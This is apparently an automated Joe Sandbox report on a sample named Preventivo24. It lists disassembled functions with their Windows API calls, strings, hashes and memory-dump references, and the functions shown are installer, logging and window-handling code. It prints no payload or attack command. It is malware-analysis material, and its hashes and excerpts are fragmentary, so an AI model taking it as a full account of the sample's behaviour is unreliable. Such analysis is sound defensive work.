VariantClear.OLEAUT32(?), ref: 00A12F84
VariantClear.OLEAUT32(?), ref: 00A13043
VariantClear.OLEAUT32(?), ref: 00A129F1

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

VariantClear.OLEAUT32(?), ref: 00A12B11
VariantClear.OLEAUT32(?), ref: 00A12B46
VariantClear.OLEAUT32(?), ref: 00A131BA
SysAllocString.OLEAUT32(00000000), ref: 00A131CB
VariantClear.OLEAUT32(?), ref: 00A13215
VariantClear.OLEAUT32(?), ref: 00A1323E
SysFreeString.OLEAUT32(00000000), ref: 00A13249
VariantClear.OLEAUT32(?), ref: 00A1334C
VariantClear.OLEAUT32(?), ref: 00A133A3
VariantClear.OLEAUT32(?), ref: 00A133CC
SysFreeString.OLEAUT32(00000000), ref: 00A133DA

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Strings

MsiGetBinaryPath, xrefs: 00A13776
MsiGetBytesCountText, xrefs: 00A13A72
MessageBox, xrefs: 00A139B3
MsiEvaluateCondition, xrefs: 00A135F8
MsiResolveFormatted, xrefs: 00A136B7
MsiGetBinaryPathIndirect, xrefs: 00A13835
MsiPublishEvents, xrefs: 00A138F4
MsiGetFormattedError, xrefs: 00A13B31
MsiSetProperty, xrefs: 00A13480
MsiGetProperty, xrefs: 00A13539
GetFontHeight, xrefs: 00A13BF0

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ClearVariant$String$Free$AllocHeap$AllocateFindProcessResource
String ID: GetFontHeight$MessageBox$MsiEvaluateCondition$MsiGetBinaryPath$MsiGetBinaryPathIndirect$MsiGetBytesCountText$MsiGetFormattedError$MsiGetProperty$MsiPublishEvents$MsiResolveFormatted$MsiSetProperty
API String ID: 2653467708-3153392536
Opcode ID: c17584045c00c82d629f072f1472ddf597ebe4515d78c42b10923d054ce5ce46
Instruction ID: 496d6275bf9909c63b1b3308a1fc4fade1d3b5aac20bdf7498efa632c1579c43
Opcode Fuzzy Hash: c17584045c00c82d629f072f1472ddf597ebe4515d78c42b10923d054ce5ce46
Instruction Fuzzy Hash: 9BE29C71D00248DFDB14DFA8C8847EEBBB5FF48314F248259E815A7391EB74AA85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B56910 Relevance: 39.0, APIs: 14, Strings: 8, Instructions: 524fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00D300A4,C0000000,00000003,00000000,00000004,00000080,00000000,26FBC52C,00000000,00D30098,00D30080), ref: 00B56985
GetLastError.KERNEL32 ref: 00B569AD
OutputDebugStringW.KERNEL32(00000000,00000020), ref: 00B56A32
OutputDebugStringW.KERNEL32(00000000,?,0000001C), ref: 00B56B62
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000001C), ref: 00B56BFE
WriteFile.KERNEL32(00000000,00D2F558,00000000,00000002,00000000,?,0000001D), ref: 00B56D75
FlushFileBuffers.KERNEL32(00000000,?,0000001D), ref: 00B56D7E

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

WriteFile.KERNEL32(00000000,?,00000000,00000002,00000000,00CA56A4,00000002), ref: 00B56E34
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001D), ref: 00B56E3D
WriteFile.KERNEL32(00000000,?,00000000,00000002,00000000,00CA56A4,00000002), ref: 00B56EE9
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001D), ref: 00B56EF2

Strings

x64, xrefs: 00B56DCE, 00B56DDA
OS Version: %u.%u.%u SP%u (%s) [%s], xrefs: 00B56E04
x86, xrefs: 00B56DC5
LOGGER->Creating LOG file at:, xrefs: 00B56C46, 00B56C58, 00B56C62
LOGGER->Reusing LOG file at:, xrefs: 00B56B07, 00B56B19, 00B56B23
workstation, xrefs: 00B56DDB
LOGGER->failed to create LOG at:, xrefs: 00B569ED, 00B569FF, 00B56A09
server, xrefs: 00B56DE0, 00B56DE8

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$BuffersFlushWrite$DebugOutputString$CreateErrorHeapLastPointerProcess
String ID: LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86
API String ID: 2331954151-4230748128
Opcode ID: e44c4de0e7eeaa772ef31a08520a34202fdd0fc1d2ce1df8e0198fb78dd3df5b
Instruction ID: ca5c0c99f9648a027fd578ed216103a0245b669cf42c3e9dfc0e1492e0e4d9ea
Opcode Fuzzy Hash: e44c4de0e7eeaa772ef31a08520a34202fdd0fc1d2ce1df8e0198fb78dd3df5b
Instruction Fuzzy Hash: E212A071A006099BDB05DF68CC45BADBBB5FF48321F548299E825AB3E1DB34AD05CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00A22BA0 Relevance: 22.1, APIs: 5, Strings: 7, Instructions: 1113stringsleepCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,msix,00000004,?,?,?,?, ?(-|/)+q,00CA7316,?), ref: 00A23003
lstrcmpiW.KERNEL32(?,?,msixbundle,0000000A,msix,00000004,?,?,?,?, ?(-|/)+q,00CA7316,?), ref: 00A23183
std::_Throw_Cpp_error.LIBCPMT ref: 00A237E4

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?, ?(-|/)+q,00CA7316,?), ref: 00A23740

Part of subcall function 00A05220: FindClose.KERNEL32(00000000), ref: 00A0536F

Part of subcall function 00B20AF0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,26FBC52C,?,00000000), ref: 00B20B3B
Part of subcall function 00B20AF0: GetLastError.KERNEL32(?,00000000), ref: 00B20B45

std::_Throw_Cpp_error.LIBCPMT ref: 00A23AB7

Strings

Launch failed. Error:, xrefs: 00A2358B
Return code of launched file:, xrefs: 00A2368B
msixbundle, xrefs: 00A23022
msix, xrefs: 00A22ED1
?(-|/)+q, xrefs: 00A22D3C
Launching file:, xrefs: 00A22C5B
appx, xrefs: 00A2319E

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Cpp_errorThrow_lstrcmpistd::_$CloseErrorFindFormatHeapLastMessageProcessSleep
String ID: ?(-|/)+q$Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
API String ID: 2536901295-140134217
Opcode ID: d07f8797808e13c740ed3e64a20548d6fb5209e72f5c8d5e7f2324af6245cdd2
Instruction ID: a08a146608a02bdb7ab296c131ba2ba1dd6a4f822ade0df5f901d35a94a85692
Opcode Fuzzy Hash: d07f8797808e13c740ed3e64a20548d6fb5209e72f5c8d5e7f2324af6245cdd2
Instruction Fuzzy Hash: 2DA2EF71D00228DFDF24CF68C844BADB7B1BF45314F1482A9E819A7281DB74AE85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A03390 Relevance: 21.6, APIs: 14, Instructions: 596windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00A03465
ShowWindow.USER32(?,00000000), ref: 00A03484
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A03492
GetWindowRect.USER32(?,?), ref: 00A034A9
ShowWindow.USER32(?,00000000), ref: 00A034CA
SetWindowLongW.USER32(00000000,000000EB,?), ref: 00A034E1

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

ShowWindow.USER32(?,?,?,00000000), ref: 00A0368D
GetWindowLongW.USER32(?,000000EB), ref: 00A036C1
ShowWindow.USER32(?,?,?,00000000), ref: 00A036DF
GetWindowRect.USER32(?,?), ref: 00A03709
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00A03898
GetWindowRect.USER32(?,?), ref: 00A03949
GetWindowRect.USER32(?,?), ref: 00A03994
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00A039D2

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Window$LongRectShow$MessageSend$AllocateHeap
String ID:
API String ID: 2680428312-0
Opcode ID: ed284c565357f9bac752a685898e7e6c03e81b1adb8da337aabfd4c87b75310d
Instruction ID: d04b78560e22af267b4c0dad87c31206d69a1e38520e962be611d17605106ea9
Opcode Fuzzy Hash: ed284c565357f9bac752a685898e7e6c03e81b1adb8da337aabfd4c87b75310d
Instruction Fuzzy Hash: BA327C72A043099FCB15CF68E884A6EBBF9BF88310F14455DF855A73A0DB30EA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009F8520 Relevance: 21.4, APIs: 14, Instructions: 411memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 009F8A00: EnterCriticalSection.KERNEL32(00D3536C,26FBC52C,00000000,?,?,?,?,?,?,009F8169,00C1530D,000000FF), ref: 009F8A3D
Part of subcall function 009F8A00: LoadCursorW.USER32(00000000,00007F00), ref: 009F8AB8
Part of subcall function 009F8A00: LoadCursorW.USER32(00000000,00007F00), ref: 009F8B60

SysFreeString.OLEAUT32(00000000), ref: 009F85E0
SysAllocString.OLEAUT32(00000000), ref: 009F861B
GetWindowLongW.USER32(?,000000EC), ref: 009F86E9
GetWindowLongW.USER32(?,000000EC), ref: 009F86F9
SetWindowLongW.USER32(?,000000EC,00000000), ref: 009F8708
NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,009F8169,00000000), ref: 009F871A
GetWindowLongW.USER32(?,000000EB), ref: 009F8728
SetWindowTextW.USER32(?,00CA2730), ref: 009F87DA
GlobalAlloc.KERNEL32(00000042,00000000), ref: 009F880B
GlobalLock.KERNEL32(00000000), ref: 009F8819
GlobalUnlock.KERNEL32(?), ref: 009F886B
SetWindowLongW.USER32(?,000000EB,00000000), ref: 009F8901
SysFreeString.OLEAUT32(00000000), ref: 009F8924
SysFreeString.OLEAUT32(00000000), ref: 009F8993

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Window$Long$String$FreeGlobal$AllocCursorLoad$CriticalEnterLockNtdllProc_SectionTextUnlock
String ID:
API String ID: 3547321447-0
Opcode ID: 46b2e61652da0e97c8820fc8cb704df80f19a7bf181462bb285bfb73e549cd5d
Instruction ID: 776d7d7432956993f38bb8bb7439e4b4882cc205a4ebae7ab8f298ceb8330c7a
Opcode Fuzzy Hash: 46b2e61652da0e97c8820fc8cb704df80f19a7bf181462bb285bfb73e549cd5d
Instruction Fuzzy Hash: 3BE19C71A0030D9BDB00DFA8CC48BAFBBB8AF49714F144169EA15E7390DB759E05DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1F740 Relevance: 14.9, APIs: 1, Strings: 7, Instructions: 930windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A1F797

Strings

AiTabPage, xrefs: 00A1F9C6, 00A1FB1F
SpawnDialog, xrefs: 00A1FEDD
' AND `Control_`=', xrefs: 00A1F93D
Dialog, xrefs: 00A1FFB2, 00A1FFDA, 00A20178, 00A201A5, 00A201CD
`Dialog_`=', xrefs: 00A1F8F4
Title, xrefs: 00A1FF73
ControlEvent, xrefs: 00A1FA3A

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend
String ID: ' AND `Control_`='$AiTabPage$ControlEvent$Dialog$SpawnDialog$Title$`Dialog_`='
API String ID: 3850602802-1412757306
Opcode ID: 1734c286d3fed1f26dade994fb67c2c37c63f9b56ceab3b3a08403d64d6c413f
Instruction ID: cd30df180f3050e254a5be0ebd7db14ca102d2447d85ee26becfa4d59ac1a831
Opcode Fuzzy Hash: 1734c286d3fed1f26dade994fb67c2c37c63f9b56ceab3b3a08403d64d6c413f
Instruction Fuzzy Hash: A4827B71E00258CFDB14DF68C844BEEBBB1BF49314F148299E449AB391DB74AE85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B23750 Relevance: 14.6, APIs: 7, Strings: 1, Instructions: 605COMMON

Download Yara Rule

APIs

Part of subcall function 00BEAB55: AcquireSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB60
Part of subcall function 00BEAB55: ReleaseSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB9A

GetStdHandle.KERNEL32(000000F5,?,26FBC52C,?,?), ref: 00B23B47
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 00B23B4E
GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 00B23B62
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00B23B69
GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,?,00000000,00CA56A4,00000002,?,?), ref: 00B23C22
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00B23C29
IsWindow.USER32(00000000), ref: 00B23EC8

Strings

Error, xrefs: 00B23E5B

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ConsoleHandle$AttributeExclusiveLockText$AcquireBufferInfoReleaseScreenWindow
String ID: Error
API String ID: 2349801371-2619118453
Opcode ID: 61a420184b4f06e41c5a275f6acad905c4fbcc64b387f9187ccebc1a3c3966ce
Instruction ID: 55837a5280daadc24255d1c7dfa0d107f7dec4ce9423eeff596813e5e8cec3b7
Opcode Fuzzy Hash: 61a420184b4f06e41c5a275f6acad905c4fbcc64b387f9187ccebc1a3c3966ce
Instruction Fuzzy Hash: 89427970D0026ACBDB24CF68DC45BAEBBF0FF58314F1042A9E419A7691EB746A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 009E1490 Relevance: 13.9, Strings: 11, Instructions: 186COMMON

Download Yara Rule

Strings

AI_CF_MINBTN_BASE_COLOR, xrefs: 009E154C
AI_CF_FRAME_CAPTION2_COLORS, xrefs: 009E150A
AI_CF_CLOSEBTN_COLORS, xrefs: 009E16FC
AI_CF_FRAME_BORDER2_COLORS, xrefs: 009E1612
AI_CF_CLOSEBTN_BORDER_COLORS, xrefs: 009E172F
AI_CF_FRAME_BORDER1_COLORS, xrefs: 009E15D0
AI_CF_FRAME_BORDER3_COLORS, xrefs: 009E1665
AI_CF_MINBTN_BORDER_COLORS, xrefs: 009E16C9
AI_CF_FRAME_BASE_COLOR, xrefs: 009E14CC
AI_CF_MINBTN_COLORS, xrefs: 009E1696
AI_CF_CLOSEBTN_BASE_COLOR, xrefs: 009E158E

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID: AI_CF_CLOSEBTN_BASE_COLOR$AI_CF_CLOSEBTN_BORDER_COLORS$AI_CF_CLOSEBTN_COLORS$AI_CF_FRAME_BASE_COLOR$AI_CF_FRAME_BORDER1_COLORS$AI_CF_FRAME_BORDER2_COLORS$AI_CF_FRAME_BORDER3_COLORS$AI_CF_FRAME_CAPTION2_COLORS$AI_CF_MINBTN_BASE_COLOR$AI_CF_MINBTN_BORDER_COLORS$AI_CF_MINBTN_COLORS
API String ID: 0-1938184520
Opcode ID: 871b8ab033498f66d087a4391f9cfeb82b155a275b5de69f42584bc169d318b9
Instruction ID: d31b9b411f602cda31cb058bf96001acdf2ef4c9df054f4eeee5d4423317c054
Opcode Fuzzy Hash: 871b8ab033498f66d087a4391f9cfeb82b155a275b5de69f42584bc169d318b9
Instruction Fuzzy Hash: 0EA15D70D4439CDAEB61CF65C9497DEBBB0AB66308F108298E4483B2C1DBB51B88DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A14E40 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 636windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00A14F2B

Part of subcall function 00BEAB55: AcquireSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB60
Part of subcall function 00BEAB55: ReleaseSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB9A

Part of subcall function 00BEAB04: AcquireSRWLockExclusive.KERNEL32(00D2E928,?,?,009EB517,00D2F53C,00C75440), ref: 00BEAB0E
Part of subcall function 00BEAB04: ReleaseSRWLockExclusive.KERNEL32(00D2E928,?,009EB517,00D2F53C,00C75440), ref: 00BEAB41
Part of subcall function 00BEAB04: WakeAllConditionVariable.KERNEL32(00D2E924,?,009EB517,00D2F53C,00C75440), ref: 00BEAB4C

SendMessageW.USER32(?,0000104D,00000000,?), ref: 00A1541E
SendMessageW.USER32(?,0000102B,?,0000000F), ref: 00A154CC
SendMessageW.USER32(?,00001003,00000001,?), ref: 00A15573

Part of subcall function 00B11C70: __cftof.LIBCMT ref: 00B11CC0

SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00A15726

Strings

Icon, xrefs: 00A15272
AiFeatIco, xrefs: 00A151AB

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend$ExclusiveLock$AcquireRelease$ConditionVariableWake__cftof
String ID: AiFeatIco$Icon
API String ID: 1739475930-1280411655
Opcode ID: b9991e9ff8e1e4dd083eac70d8c3cf49fa68f9175476462499afeddcce4a6a19
Instruction ID: 9a28260a3172292a17cc33e26bbebc935186a248a09f605d202f9ade40b56afe
Opcode Fuzzy Hash: b9991e9ff8e1e4dd083eac70d8c3cf49fa68f9175476462499afeddcce4a6a19
Instruction Fuzzy Hash: 1B528A71D00658DFDB25DF68CC48BEEBBB1AF88304F144599E45AAB2A1DB706E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C0C5E2 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00C0C7C6

Strings

1#QNAN, xrefs: 00C0C6F5
1#IND, xrefs: 00C0C6E7
1#INF, xrefs: 00C0C718
1#SNAN, xrefs: 00C0C6EE

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
